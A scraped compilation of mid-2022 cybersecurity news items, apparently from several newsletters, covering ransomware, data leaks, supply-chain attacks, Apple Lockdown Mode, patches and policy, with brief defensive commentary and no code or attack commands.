“My point is that Ukraine should become an example for other countries who cannot afford […] AI behavioral biometrics anti-phishing system crap, and stuff like this. We cannot afford these things in Ukraine. […] This should become an example on how to actually and effectively defend yourself because we’re dealing with the first cyber war in human history,” Ackermann said.

Australian prison suspends visits

The Port Phillip Prison in Melbourne, Australia, has been forced to suspend prisoner visits after its computer systems fell victim to “a sophisticated cyber ransom attack,” whatever that means.

La Poste Mobile ransomware attack

French mobile phone network La Poste Mobile is still struggling to recover from a ransomware attack that took place more than a week ago and has crippled its administrative and management services. While service has not been affected, the company noted that customer data might have been accessed, The Record reported.

La Poste Mobile ransomware attack

US Congress DDOS

Russian hacktivist DDoS group Killnet claimed responsibility for an attack on the website of the US Congress, according to Cyberscoop.

Stolen crypto

According to blockchain security and auditing company CertiK, cryptocurrency platforms lost more than $2 billion to hacks in the first half of 2022, a figure that’s more than the entire last year combined. The vast majority of breaches have been linked to “flash loan attacks,” the company said.

CertiK, cryptocurrency platforms lost more than $2 billion to hacks in the first half of 2022

PyPI enforces 2FA for top projects

The administrators of the Python Package Index (PyPI) are enrolling the top 1% of most popular Python packages (~3,500) into mandatory two-factor authentication (2FA).

The administrators of the Python Package Index (PyPI) are enrolling the top 1% of most popular Python packages (~3,500) into mandatory two-factor authentication (2FA).

The PyPI team said it would be working with Google Open Source Security Team to distribute Google Titan security keys to all project maintainers in order to ensure their accounts can’t be hijacked for supply chain attacks that could have massive consequences. PyPI’s move comes after GitHub moved to do the same with the top npm packages last year. Unfortunately, the rollout didn’t go as planned and without some drama, and the owner of one Python library decided they didn’t want to maintain a “critical” project and deleted and re-uploaded their package in order to reset the download counter.

Russia to create its own mobile app store

The Russian government approved on Friday the creation of a national mobile app store. The store’s app will be mandatory and will have to be pre-installed on all devices sold in the country. The store will operate based on rules “approved by the Ministry of Digital Development,” which will also curate its app inventory.

L3Harris said they had approval for NSO deal

Last month, US media reported that US defense contractor L3Harris was in advanced talks to acquire Israeli spyware vendor NSO Group, in a deal that fell through after the White House showed its disapproval at a DOD contractor seeking to buy a sanctioned entity. However, in a report on Sunday, the New York Times said that several American intelligence officials were in the know and approved of L3Harris’ plan, believing NSO’ technology could benefit US agencies like the FBI and CIA, but that none of these officials anticipated the Biden’s administration stern response to news of the upcoming acquisition.

UK asks law firms not to recommend paying ransomware gangs

In a joint letter signed by the UK ICO and NCSC, the two agencies have asked British law firms to stop advising their customers in paying ransom demands in ransomware attacks.

Paying ransoms to release locked data does not reduce the risk to individuals, is not an obligation under data protection law, and is not considered as a reasonable step to safeguard data.

The ICO has clarified that it will not take this into account as a mitigating factor when considering the type or scale of enforcement action. It will however consider early engagement and co-operation with the NCSC positively when setting its response.

Dutch secret services told to delete citizen database

The MIVD and the AIVD, the Netherlands’ secret service agencies, have been told to destroy a database they created to store the personal details of millions of Dutch citizens. The country’s data protection supervisor found that the database had been created through an unlawful process and ordered the Dutch Ministries of Defense and the Interior to delete it following a complaint filed by the European Digital Rights (EDRi), a pan-European association of civil and human rights organizations.

Dutch government increases prison sentences for cyber espionage

The Dutch government passed a bill last week that increased the prison sentences for espionage activities. A clause in the document increases the prison sentences by a third for computer offenses if carried out at the behest of a foreign power. [Coverage in RTL Nieuws]

Mauritius Telecom espionage scandal

Sherry Singh resigned at the end of June from the post of CEO of Mauritius Telecom, claiming in a radio interview that the country’s Prime Minister, Pravind Jugnauth, ordered him to install traffic-sniffing equipment on the telecom’s network. Singh said the equipment was meant to monitor and decrypt internet traffic for the benefit of a foreign state, RFI reported.

Immigration services for sale

A threat actor going by the name of Royal Bank is advertising immigration services countries like the US and Canada on the Russian-language forum XSS. Flashpoint says the threat actor is selling the service to Russian citizens looking to leave the country, and the service costs $5,000.

Gaming accounts on the dark web

Threat intel firm DarkOwl has an overview of gaming and streaming accounts for sale on the dark web.

AstraLocker and Yashma decrypters

Antivirus maker Emsisoft has released on Friday free decrypters for the AstraLocker and Yashma ransomware strains.

Raspberry Robin

Cybereason researchers have published a technical report on the Raspberry Robin malware, which uses LNK files to infect its victims and is usually delivered through file archives, removable devices (USB), or ISO files. According to Cybereason, the majority of victims are located in Europe. A report on the same malware is also available from Red Canary.

Raspberry Robin

Rolling PWN Attack

A security researcher published details last week on a vulnerability in the key fob technology used by Honda cars. The attack, nicknamed Rolling PWN, can allow threat actors to unlock doors and start engines on all Honda cars sold between 2012 and 2022. The vulnerability is currently tracked as CVE-2021-46145. [Coverage in Motherboard]

Attacks on AI systems

In a whitepaper published last week, NCC Group chief scientist Chris Anley explores the common security problems and real-world practical attacks on AI systems.

Recorded Future acquires Haching

Threat intelligence giant Recorded Future announced on Friday the acquisition of Hatching, a platform specialized in automated sandbox malware analysis.

Apple debuts Lockdown Mode to protect users against high-end spyware

In an unexpected but very welcomed move, Apple announced this week plans to add a new security feature to its iOS and macOS operating systems later this fall. Named Lockdown Mode, this new feature will be available as a new “mode” in a device’s settings section.

Apple debuts Lockdown Mode to protect users against high-end spyware

Apple says that once users enable Lockdown Mode, iOS and macOS will be put into what the company describes as an extreme and super-secure protection mode.

What happens under the hood is that iOS and macOS will turn off some of their internal services and features that are commonly abused by threat actors to attack and compromise devices. Apple said that Lockdown Mode would focus on five major areas of concern for the company. This includes:

  • Messages: Commonly used for the delivery of zero- or one-click exploits, but once Lockdown Mode is enabled, the Messages app will be put into a state where it would only support text and image-based communications, with no support for URL previews or complex audio and video formats.
  • Web browsing: Since many recent actively exploited zero-days against Apple devices are in Safari components, once Lockdown Mode is enabled, Apple said it would disable many of the new and complex web API technologies that have been added in Safari in recent years, but which are not essential to browsing websites. This includes stuff like WebGL, WebAudio, WebRTC, MathML, Picture-in-Picture, and web fonts, among many others.
  • Wired connections: But remote attacks aren’t the only way to compromise iOS and macOS devices. Apple says that once Lockdown Mode is enabled, all wired connection ports will be disabled and blocked once a device is locked.
  • Configuration profiles: A recent technique that has become popular with threat actors has been to trick users into installing malicious OS configuration profiles to secretly add a victim’s device to an attacker’s network. The idea is that once a device is joined to an attacker’s mobile device management (MDM) server, the threat actor can exfiltrate data or install malicious apps on the device. But Apple says that when Lockdown Mode is enabled, a device’s MDM service will be disabled, effectively countering and preventing any such attack from working.
  • Apple services: Besides remote and physical access attacks, Apple users may also be at risk from social engineering attacks. For this, Apple says that Lockdown Mode comes with a feature that will block unknown individuals from starting calls or conversations via Apple services if the owner has not contacted that person before.

Lockdown Mode is not meant for everyday users

With so many features turned off, Apple devices will effectively be thrown back a decade into the past. It is no exaggeration to state that Lockdown Mode will greatly degrade the user experience on an iPhone, iPad, or macOS device.

However, Apple’s security team said they didn’t design this feature to be user-friendly. It is effectively a last-resort option for some of its users that are active civil society members, dissidents, politicians, or intelligence and law enforcement employees. These users are the ones who are typically targeted by advanced threat actors, sometimes state-sponsored entities, which have access to high-grade and expensive exploits designed for stealthy attacks.

Apple hopes that Lockdown Mode will be able to protect these users by disabling all the common avenues of attacks that past high-end exploits and spyware developers have used against its devices.

If you’re a regular Joe Blow, Lockdown Mode will look cool and interesting for a hot minute, after which it will just get in the way of how you connect with friends and use your device. Turning it on will be overkill, and you’ll most likely turn it back off within a few days. However, for people fighting the good fight, Lockdown Mode might end up saving their lives, and we’re not exaggerating when we’re stating this.

Ukrainian intelligence officers leak

A group of Russian hackers calling themselves RaHDit have published a trove of documents with the alleged identities of thousands of Ukrainian intelligence officers. The leak is currently still unverified, Risky Biz News understands, but the RaHDit crew was also previously linked to Project Nemesis, a project among Russian “hacktivists” that doxxed members of the Russian military.

Ukrainian intelligence officers leak

PFC releases list of affected healthcare orgs

Professional Finance Company (PFC), a US company that provides various financial and payment services to the healthcare sector, has disclosed a security incident that took place in February this year and involved a ransomware attack. The company said the hackers stole data from its systems that belonged to more than 600 of its customers, most of which are US healthcare organizations, such as hospitals and clinics, and the stolen data also included patient details. [Coverage in Becker’s Hospital Review]

Hacker steals from Portuguese hotel guests

A hacker has stolen more than half a million euros from the guests of the Marino Boutique Hotel in Lisbon. The hacker broke into the hotel’s online booking platform, locked out the hotel’s personnel, changed room prices to a derisory €40, and emailed the hotel’s former customers this “special offer.” During four days between June 12 and June 16, the hotel said the hacker collected payments for thousands of room bookings, which the hotel said would have normally cost around half a million euros. It took the hotel staff four days to regain access to their booking platform, which they initially thought was having a technical issue. The hotel, which is one of the most expensive in Lisbon, said it is considering suing the booking platform for not detecting the hacker’s intrusion. CNN Portugal said they found the hacker on one of its Telegram channels, where they bragged about having pulled the same attack against other hotels in many other countries. The hacker identified as Russian and claimed to have made over €20 million from his cybercrime activities. [via @chum1ng0]

How the Ronin hack took place

A reporter from cryptocurrency news site The Block has uncovered the root cause of the Ronin Network hack, which lost $540 million worth of cryptocurrency earlier this year, in March, to North Korean state-sponsored hackers. The Block says the company had its IT network compromised after one of its employees was lured into opening a malicious PDF document received from the hackers, touting a fantastic job offer with a generous compensation package, a scheme for which North Korean hackers are known to excel at.

Meta sues scraping company

Meta filed a lawsuit this week against a company named Octopus, a US subsidiary of a Chinese tech company. Facebook said Octopus provided website scraping technology to its customers, including the ability to scrape content from Meta properties such as Facebook and Instagram, including private content that’s hidden and requires authentication. In addition, Meta said it also sued a Turkish national named Ekrem Ateş for scraping the data of more than 350,000 Instagram users.

Microsoft rolls back VBA macros ban

After blocking VBA macros in five Office applications earlier this year in February, Microsoft has apparently rolled back the change earlier this week, in what the company described as “feedback received.” As expected, the rollback of one of the company’s most requested security-related changes launched a whirlwind of complaints and ironies directed at Redmond. Even worse, it appears that Microsoft’s change had its desired effects, contributing to a decline in macro-based malware in recent months to the point of extinction. Following Microsoft’s change of heart—cybercrime groups, rejoice, I guess! [Coverage in Bleeping Computer]

Biometrics database speed-run

The Russian Parliament voted this week on a law that will allow it to gather biometrics data from Russian banks into a central database named the Unified Biometric System (EBS). The law effectively allows the government to pilfer this data from banks without the express approval of Russian citizens, and government officials said this would allow the widespread deployment of biometric identification and authentication technologies to as many organizations as possible. Also helps with other “things” beyond paying for goods without payment cards, wink-wink.

Trickbot gang systematically attacks Ukraine

An IBM X-Force report published on Thursday claims that the operators of the Trickbot malware have been “systematically attacking Ukraine since the Russian invasion.” IBM notes that Trickbot has conducted at least six different malspam campaigns against Ukrainian users, something they have never done in the past. IBM notes that Trickbot is currently controlled by members of the old Conti ransomware gang, which got into a little bit of trouble earlier this year, having their hacking tools and internal chats leaked online after publicly expressing support for the Russian government.

Russian influence operations

A Recorded Future report published on Thursday has delved into Russia’s most recent influence operations, which according to the company, appear to be focused on creating a divide in Western countries around their efforts and support of Ukraine against Russia’s invasion.

These information operations almost certainly aim to undermine and divide the Western coalition on Ukraine both directly, by creating or exacerbating divisions between Western coalition countries, and indirectly, by influencing European populations to oppose their governments’ support of Ukraine and negative policies toward Russia.

Google Cloud Threat Horizons Report #3

In the third edition of its threat and trends report, the Google Cloud security team said that its cloud service continues to see a large number of attacks, with the majority aiming to deploy cryptomining payloads. The most common points of entry for these attacks continue to be brute-force attacks and unpatched software vulnerabilities.

Google Cloud Threat Horizons Report #3

In addition, Google also noted that, in recent months, they’ve seen a rise in ransomware-like attacks against some of their SQL database infrastructure.

The most common technique observed was where attackers were seen brute forcing SQL databases, cloning a database table into a new table, encrypting the data, and proceeding to drop the original table. Attackers have been observed leaving instructions in the new table that instruct the victim to transfer funds to a specified crypto wallet to recover their data. Similar tactics have been seen around cloud project takeover, with threats to delete data & resources. These attacks were most commonly observed in developer and proof of concept (POC) instances. In many instances, these were targeted due to fewer security controls being placed in non-production environments due to their perceived lower risk.

MySQL servers targeted with AsyncRAT

AhnLab researchers have published a report on a recent series of attacks against MySQL database servers that have been infected with the AsyncRAT remote access trojan. According to the research team, the attacks leverage brute-force attacks and dictionary attacks against the MySQL root admin account as the initial access vector.

Teng Snake

S2W Talon has published a report on Teng Snake, a suspected Chinese threat actor that has been engaging in hacking and data leaks.

Checkmate ransomware

Taiwanese NAS vendor QNAP published a security advisory on Thursday warning its users about a new ransomware strain named Checkmate that has been infecting some of its devices. QNAP said the Checkmate gang uses dictionary attacks against a device’s SMB service to break into accounts using weak passwords.

1.2k malicious npm packages

Security firm Checkmarx said it uncovered a cluster of more than 1,200 malicious npm packages that have been uploaded on the npm portal in a short period of time using an automated process by a threat actor the company calls CuteBoi. The company said almost all the packages contain malicious code that runs a coinminer inside apps where the packages are deployed. Checkmarx has set up a dedicated website to track and list recent npm packages linked to the CuteBoi cluster.

Maui ransomware

In a joint security advisory published on Wednesday by CISA, the FBI, and the US Treasury, the US government said that North Korean state-sponsored hackers had developed a ransomware strain named Maui. Officials said the Maui ransomware had been used in attacks dating as far back as May 2021, and many of its targets have been US healthcare organizations. Cybersecurity firm Stairwell has also published its own report on this new threat, noting some of the Maui ransomware’s advanced features.

ABCsoup

Zimperium has published a report on ABCsoup, a cybercrime operation that builds and distributes malicious browser extensions for Google Chrome, Opera, and Firefox. The extensions mimic the IDs of legitimate add-ons and are typically distributed as Windows executables to bypass security checks found in official extension stores.

YourCyanide

CloudSEK has published a report on YourCyanide, a rare ransomware strain that comes with a mail-based worm behavior, previously also covered by Trend Micro here.

Ekipa

The same CloudSEK team also published a report this week on Ekipa, a remote access trojan sold on underground cybercrime forums for $3,000. According to CloudSEK, the RAT comes with a builder and would operate as a Microsoft Word macro or Excel add-on.

Ekipa

OrBit

Intezer published a technical analysis on a new malware strain named OrBit. The malware targets Linux systems and once deployed on a compromised, it can provide threat actors with remote access capabilities over SSH, can harvest credentials, and logs TTY commands. At a technical level, the malware is also of note because once deployed, it infects all processes running on a Linux system, including new ones.

LockBit 3.0

We now have the first technical report on the new version of the LockBit ransomware, also known as LockBit 3.0. Just like Fabian Wosar of Emsisoft pointed out last week, Cluster25 researchers also point out several similarities in the LockBit 3.0 code to the now-defunct Darkside and BlackMatter ransomware strains.

HavanaCrypt

Trend Micro has published an analysis of the HavanaCrypt ransomware, which is currently being distributed hidden in files posing as a Google Chrome browser update.

TrippleCross

A computer science student open-sourced last month a rootkit named TripleCross that abuses the eBPF network package filtering technology in Linux systems after such malware has become popular in recent months.

PINKPANTHER

On the same note, a security researcher also open-sourced this week a Windows kernel exploit named PINKPANTHER that can run shellcode on all recent versions of Windows to replace a process’ access token with the SYSTEM token and elevate an attacker’s privileges on an infected machine.

Chinese APT targets Russia

SentinelOne has published a report on a recent series of spear-phishing operations that appeared to have been carried out by a Chinese threat group against Russian organizations, including some government targets.

YamaBot

Japan’s CERT team has published a technical analysis of YamaBot (also known as Kaos), a malware strain used by North Korean state-sponsored hackers on compromised Linux and Windows systems.

APT campaign uses recent NATO conference as lure

Lab52 has published a report on a suspected APT campaign that used the recently concluded NATO conference in Madrid, Spain, as a lure for its spear-phishing emails.

Apple bug bounty news

Besides announcing Lockdown Mode this week, Apple also said it would also add this new mode to its official bug bounty program. The company plans to reward researchers who find Lockdown Mode bypasses and some vulnerabilities could earn researchers up to $2 million, in what Apple described as “the highest maximum bounty payout in the industry.”

What now?: So… this happened this week.

CVE-2022-23744 Detail

Group-IB splits

Cybersecurity and threat intelligence firm Group-IB has split its Russian branch from its international operation. The company was originally founded in Russia and moved its headquarters to Singapore. Ilya Sachkov, founder and CEO of Russian security firm Group-IB, was detained in Moscow in September 2021 on treason charges for allegedly sharing data of Russian hackers with international authorities.

Tool release

Security firm SpectreOps has open-sourced a new tool called Koh that can be used to capture Windows account authentication tokens for new logon sessions and reuse them for future attacks. A technical introduction to the tool is also available in a dedicated blog post.

ZuoRAT Malware Targets SOHO Routers

A remote access trojan (RAT) known as ZuoRAT has been detected attacking small office/home office (SOHO) routers. Black Lotus Labs have been tracking the campaign, which has been active since 2020. ZuoRAT takes complete control of SOHO routers in North America and Europe.

Note

  • Usually as we talk about attacks against home routers and similar “IoT” devices, we talk about nuisance malware like Mirai. But among the background noise are some more sophisticated attacks using the same simple exploits to turn these devices into a powerful distributed attack platform. This has been done in the past with MikroTik routers and others as well.
  • This malware is operating under the pretext that SOHO routers are not maintained or secured. Make sure that your routers are configured for automatic firmware updates, that remote management is either disabled or restricted to very specific authorized devices, and pay attention to any vendor provided security posture check. Lastly, make sure the device is still supported and replace it if not. This RAT cannot survive reboots, so if you’re thinking your infected, reboot your router; then you need to perform a factory reset to make sure only the settings you intend are in effect.
  • These routers are the first line of defense line of defense in “work from home” applications. Yet, as with many smart appliances (“things”), keeping them current is costly and rarely routine.

Read more in

Apple’s Lockdown Mode Will Protect Users from Mercenary Spyware

Apple has announced a new feature that will help protect users’ devices from spyware. Lockdown Mode will be introduced in iOS 16, iPadOS 16, and macOS Venture, which are scheduled to be released later this year. Apple says, “Lockdown Mode offers an extreme, optional level of security for the very few users who, because of who they are or what they do, may be personally targeted by some of the most sophisticated digital threats.” Users will be able to enable the feature in the Settings menu.

Note

  • Interesting move by Apple to give users the option to prioritize security over functionality. Also interesting as only a very small number of users will benefit from it. We will have to see how many attacks are actually disrupted by this setting. (I don’t doubt it will work, but the real question will be if the right target group will take advantage of it.)
  • I think we will be surprised how many CEOs might be willing to lockdown their phone this way. If your CEO wears an analog watch that does NOT show altitude, phases of the moon or beep on every Instagram post, configure an iPhone in this Lockdown Mode when it comes out and do a demo to CEOs and even the Board.
  • Something to consider for potential targets (VIPs?) working in risky areas. Read and test the impacts carefully and review them with your possible user to ensure they don’t wind up turning this off because they are not able to work. Impacts blocking most attachment types other than images, disablement of link preview, Java JIT compiling on non-trusted websites, blocking MDM profile updates and inbound service requests such as calls, or FaceTime being blocked if you haven’t connected previously.
  • One should add international travelers to the list of those that may find this mode useful. (Everyone might want to turn it on in such hostile environments as Starbucks, airports, or Washington DC.)

Read more in

OpenSSL Patches Two Vulnerabilities

OpenSSL maintainers have released updates to address two vulnerabilities, including a high-severity memory corruption flaw that could be exploited to allow remote code execution. Users are urged to upgrade to OpenSSL 3.0.5.

Note

  • These are two interesting vulnerabilities and I think they may have gotten a bit lost during the short work week. CVE-2022-2274 could have huge impact, but luckily it only affects OpenSSL on specific CPUs, and more importantly, it was caught immediately after the bug was introduced so the footprint of installed vulnerable OpenSSL versions is negligible. The second issue is also CPU version dependent, but it affects a much larger range. It could potentially affect a lot of data that was encrypted and is now considered “safe” even though a very small part of the data has not been encrypted.
  • Good to see fast reaction by OpenSSL. That needs to become the norm for open source software, medical devices, etc.
  • The flaw was introduced in OpenSSL 3.0.4, so make sure that when you’re updating, particularly if you’re playing catch-up, you move to at least 3.0.5. While you’re waiting on vendor provided patches, it’d be a good time to take stock of the versions of OpenSSL you have installed to see what your risk levels are.

Read more in

FBI: Deepfakes and Stolen PII are Being Used to Apply for Jobs

The US FBI says it has received an increasing number of complaints about people applying for remote work employment using stolen personally identifiable information and deepfake video. The phony job applicants are seeking remote or work-from-home positions that would allow then to access “customer PII, financial data, corporate IT databases and/or proprietary information.” Some reports include the applicants submitting stolen PII for background checks.

Note

  • Economic conditions mean many HR organizations are dealing with layoffs/redundancy while also hiring in key areas – busy HR people often take shortcuts. As a minimum, use this item to touch base with HR and IT management to make sure hires in positions that will be given sensitive access get thorough reference and background checks.
  • Trust but verify. Part of the scheme is using doctored videos, but the audio doesn’t match the video exactly, particularly for coughs or sneezes. Use employment background screening processes to verify that the person is truly who they claim to be. The cost of an in-person meet and greet may offset the cost of damage from a fake hire.

Read more in

Cyberattack Against Geographic Solutions Affects Multiple States’ Unemployment Benefits

A cyberattack against an IT services provider has disrupted unemployment and work benefits for people in multiple US states. Geographic Solutions has not yet made a public statement, but it has notified state agencies affected by the incident.

Note

  • This is a good reminder that we need to look at the supply chain for all business services to an organization for its Business Continuity Planning. If you have not done so already, you should review what key functions your organization has outsourced to third parties and how you would continue to provide that service should that provider become a victim of a cyber-attack or other issue that results in them being offline.
  • Using companies like Geographic Solutions provides easy access services you may not be able to otherwise deliver, and they are able to achieve economies of scale, which is a boon to your business. Make sure that you’re incorporating the risks of outsourced services being offline for the time needed to recover from a ransomware attack. Make sure that interdependencies are also understood then develop your response plan.

Read more in

IconBurst NPM Supply Chain Attack

Researchers at ReversingLabs have detected a software supply chain attack involving maliciously-crafted NPM packages. The attack has been ongoing since at least December 2021. The attacks use typo-squatting to trick users into downloading the malicious packages.

Note

  • These typos which result in the incorrect package are incredibly easy to make, particularly with pressure to deliver rapidly. Make sure your build/integration process is validating that the packages intended are what is loaded. Name, version, checksum, and that you’re responding to exceptions.

Read more in

North Korean Hackers Targeting US Healthcare Sector

In a joint alert, the US Treasury Department, the FBI, and the Cybersecurity and Infrastructure Security Agency (CISA) warn that north Korean state-sponsored cyberthreat actors are targeting US healthcare sector organizations. The hackers have been using Maui ransomware since at least May 2021. “The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, bitcoin wallet information, the decryptor file, and/or benign samples of encrypted files.”

Note

  • No matter what sector you’re in, add the IOCs from the CISA bulletin to your SIEM. The attack vector is not yet known, mitigations include making sure you have MFA on your entry points, only authorized systems and individuals can access sensitive data and encryption of sensitive data at rest wherever possible.

Read more in

National Defense Authorization Act Cybersecurity-Related Amendments

US Representative Jim Langevin (D-Rhode Island) has introduced several cybersecurity-related provisions to the National Defense Authorization Act (NDAA). One of the amendments would create an Office of Cybersecurity Statistics within the Cybersecurity and Infrastructure Security Agency (CISA). Another amendment includes provisions suggested by the Cyberspace Solarium Commission to bolster cybersecurity for “systemically important critical infrastructure.”

Note

  • I don’t see any game changers, mostly a lot more data collection and reporting requirements – more pages of documents have never equated to reduction in risk. Game changers would be requiring DoD (and by extension those who sell to DoD) to upgrade IT operations to meet basic security hygiene requirements, vs. more documents on how to spackle security on top of badly developed and administered systems in data centers and in the cloud.
  • ​​​​​​​Key to the Office of Cybersecurity Statistics will be the capability to process, store and analyze data in an expeditious fashion, while an exciting capability, expeditious funding is critical. Expect this to change in committee. This also includes attempting to insulate the CISA to political swings by limiting the term of the CISA director to five years and requirement for military leaders to report on acceleration of domestic production of rare-earth metals.

Read more in

Google Updates Chrome to Fix Actively Exploited Vulnerability

Google has updated the Chrome Stable Channel for Desktop to version 103.0.5060.114. The newest version of the browser addresses four security issues, including a high-severity flaw that is being actively exploited. This is the fourth zero-day flaw in Chrome that Google has patched this year.

Note

  • Chrome, like most other browsers, will update automatically as long as you close and reopen. Even so, this is a good reminder that client-side attacks should be part of the scope of work in red team and pen testing engagements.
  • ​​​​​​​Heap overflow, use-after-free and type confusion issues are addressed. Chrome updates continue to hone our ability to push out-of-band patches. Don’t forget to set a time limit on users relaunching browsers to load the updated version. Be sure to check, and update, chromium-based browsers in your environment.

Read more in

NIST’s Quantum-Resistant Algorithms

The US National Institute of Standards and Technology (NIST has identified four candidate quantum-resistant encryption algorithms. The four algorithms will be incorporated into NIST’s post-quantum encryption standard. The algorithms are CRYSTALS-Kyber, CRYSTALS-Dilithium, FALCON, and SPHINCS+.

Note

  • The quest for quantum-resistant algorithms started in 2016. CRYSTALS-Kyber is intended for general key-establishment, CRYSTALS-Dilithium for digital signatures, FALCON as a fallback for cases where the CRYSTALS-Dilithium signatures are too large, and SPHINCS+ is the slowest of the bunch, but is suggested as an alternative where you want to use alternate mathematical models. Don’t expect to find these in vendor products right away. Once they are available, you’re going to want to do regression testing to not only ensure that you’re functional, but also for other operational or performance impacts.
  • We have ample time to replace RSA. There will be no “Quantum Apocalypse.” However, it is important to keep in mind that attacks against modern cryptography are rarely against the algorithms but rather against implementations and applications. We still have a long way to go.

Read more in

New U.S. federal warning highlights MedusaLocker group targeting health care organizations

The FBI and U.S. Cybersecurity and Infrastructure Security Agency warned of an uptick in activity from the MedusaLocker ransomware group. The group, which has been around since 2019, gained notoriety during the COVID-19 pandemic for targeting health care organizations. The group operates as a ransomware-as-a-service model, according to the joint alert, based on the way it splits payments. Medusa recently switched to a new infiltration method by targeting vulnerable RDP configurations. Then, it can carry out a variety of actions, including killing popular anti-virus software processes, schedules a task to run the ransomware every 15 minutes and deletes local backups.

Read more

Popular wireless data router vulnerable to code execution vulnerabilities

Cisco Talos recently discovered four vulnerabilities in the Robustel R1510 industrial cellular router. The R1510 is a portable router that shares 2G, 3G and 4G wireless internet access. It comes with several advanced software features for users like the ability to connect to a VPN, cloud data management and smart reboot. There are three command injection vulnerabilities that exist in this device, as well as a data removal vulnerability that could allow an attacker to arbitrarily remove files from the device. An attacker could trigger the command injection issues — CVE-2022-32585, CVE-2022-33312 – CVE-2022-33314 and CVE-2022-33325 – CVE-2022-33329 — by sending a specific series of requests to the targeted device. If successful, the attacker could gain the ability to execute remote code.

Read more

China faces its first truly mega-leak

When you have a population of more than 1.4 billion people, a data breach of epic proportions is just bound to happen at one point or another, and it’s more of a question of time. While something like this has happened in the United States on several occasions, the Chinese government is currently dealing with the first mega leak of its kind and, by far, the largest data breach in the country’s history.

While the leak occurred months before, the incident came to light over the weekend, after a threat actor named ChinaDan posted an ad on an underground cybercrime forum, claiming to have obtained the personal data of more than one billion Chinese nationals from a database server that was left exposed online by the Shanghai National Police (SHGA).

Threat actor named ChinaDan posted an ad on an underground cybercrime forum, claiming to have obtained the personal data of more than one billion Chinese nationals from a database server that was left exposed online by the Shanghai National Police (SHGA).

According to a sample released by the threat actor, the data contains details such as names, addresses, national ID numbers, mobile numbers, and police and medical records.

ChinaDan said they are currently looking for buyers for this gigantic data trove, with which they were willing to part ways for the tiny sum of $200,000 worth of Bitcoin.

While previous leaks sold for this price have often turned out to be scams or publicity stunts, reporters from the Wall Street Journal and CNN said they already confirmed the data’s authenticity with some of the victims who had information listed in ChinaDan’s samples.

And in the old adage that “don’t believe anything until Russia China denies it,” it didn’t take long for an official confirmation of the leak’s authenticity to come through—as Chinese authorities began censoring talk on the leak on Chinese social media as soon as news started getting traction on Monday, the Financial Times reported.

But by this point, it may be too late for the Chinese government to curtail discussions on the incident, as several cyber-security firms and researchers have already confirmed that the leak is authentic and that it came from a government source.

The leak also comes at a sensitive time for Beijing, as the government has been churning out rules and legislation on data privacy and data security over the past two years. While the government may have targeted its sprawling and generally-unregulated tech sector, the incident may end up being a seminal moment for its public agencies as well, many of which have leaked similar information before, but on a smaller scale.

Such leaks have been happening in China’s corner of the internet for years but have been largely ignored by western security firms and security researchers, many of which have been focused on providing services for western countries and companies, and past China-related leaks have typically never been shared outside local underground hacking forums and got very small coverage in some rogue Chinese IT and security blogs, once in a while.

Marriott security breach

The Marriott hotel chain confirmed on Tuesday a security incident after hackers broke into the company’s IT network and stole 20GB of sensitive data, including some documents containing credit card information. DataBreaches.net—which first reported the incident and had been in contact with the hackers—said the threat actor had been trying to extort the hotel chain over the past few weeks, asking for a ransom demand to not disclose the security breach to the public.

Tutu hack

Hackers have leaked the data of millions of users of Tutu.ru, a Russian online portal that can be used to book airplane, train, and bus tickets for national and international travel. Data for tens of millions of users has been leaked, including details such as names, home addresses, phone numbers, emails, passport scans, and even some hashed passwords. Tutu confirmed the breach in a statement to Russian media.

The cyber-attack that wasn’t

A Palestinian group of hackers known as Sabareen and Iranian media ran pompous reports on Monday about a cyber-attack that crippled Tel Aviv’s metro system. The problem with the reports is that Tel Aviv doesn’t have a functional metro system, which is still under construction, so the hackers didn’t disrupt anything except some poor construction company’s homepage.

Another crypto-heist

DeFi service Crema Finance lost $8.78 million worth of cryptocurrency over the weekend after an attacker exploited a bug in the company’s platform.

Blockchain security firm OtterSec described the incident as yet another “flash loan” attack that have plagued DeFi platforms for the past two years.

In a series of tweets posted on Monday and Tuesday, Crema Finance said its investigation is going well, and they believe they already identified the threat actor’s trail, including their Discord account.

EU puts out new big tech rules

The EU passed on Tuesday the Digital Services Act and Digital Markets Act, two pieces of legislation meant to curtail big tech’s powers and give more power to end-users. The Digital Services Act is focused on user security, data privacy, and also takes great care to push companies to be more aggressive with content moderation, including cracking down on misinformation campaigns. The Digital Markets Act cracks down on walled gardens—forcing big tech to play nice with smaller companies, such as providing service interoperability.

Chrome zero-day

Google released Chrome v103.0.5060.114 for Windows users to patch an actively exploited zero-day (CVE-2022-2294). The vulnerability was described as a heap buffer overflow in Chrome’s WebRTC component and was found by Jan Vojtesek from security firm Avast last Friday.

AirTag abuse

Well, it has happened. A local Japanese gang has apparently put Apple AirTag devices on police cars to track them.

Russian govt on cyber-attacks

The Russian government said that while at the start of the war, cyber-attacks have disrupted the activity of many of its websites, the government and the private sector are getting better at stopping incoming attacks, especially DDoS attacks. [via Oleg Shakirov]

UK MPs call for Dahua and Hikvision ban

A group of 67 MPs has called on the UK government to formally ban the sale and use of Dahua and Hikvision CCTV cameras in the UK. Equipment made by the two companies has been linked to human rights abuses and intensive surveillance in China’s Xinjiang region.

NIST quantum-resistant encryption news

US NIST announced on Tuesday that it chose the first set of encryption tools, also known as quantum-resistant encryption algorithms, meant to protect sensitive data against an attack from a quantum computer. The four selected encryption algorithms are CRYSTALS-Kyber, CRYSTALS-Dilithium, FALCON, and SPHINCS+, and NIST said they would become part of the agency’s post-quantum cryptographic standard, expected to be finalized in the next two years.

GanjaMask

Cannabis ISAO, a security group inside the nascent US cannabis industry, published a report last week on GanjaMask, a threat actor targeting their members. Cannabis ISAO says GanjaMask runs a network of websites posing as fake US-based cannabis. The role of these websites is to collect payments and payment card details from customers who place orders through the sites.

Academic research on Gozi

An academic study published earlier this year looked at the internal structure and operations of the Gozi cybercrime cartel.

AstraLocker releases decryption keys

The operators of the AstraLocker ransomware said they are shutting down their operation and have released free decryption keys for all their past victims. The gang told BleepingComputer they are now switching to running a crypto-mining botnet.

Malicious npm libraries

In a report published on Tuesday, ReversingLabs said it found 31 npm libraries that contained obfuscated JavaScript code that would web form data. The npm packages had been available on the npm portal for the past two months, and the vast majority were disguised to look like tools meant for manipulating and working with icon images. ReversingLabs said the libraries contained hidden code that would steal any data that users entered inside forms on websites or mobile apps where the malicious libraries would be accidentally included. The attack most likely targeted information entered in password fields and payment forms, data that threat actors could easily monetize.

Luna Moth

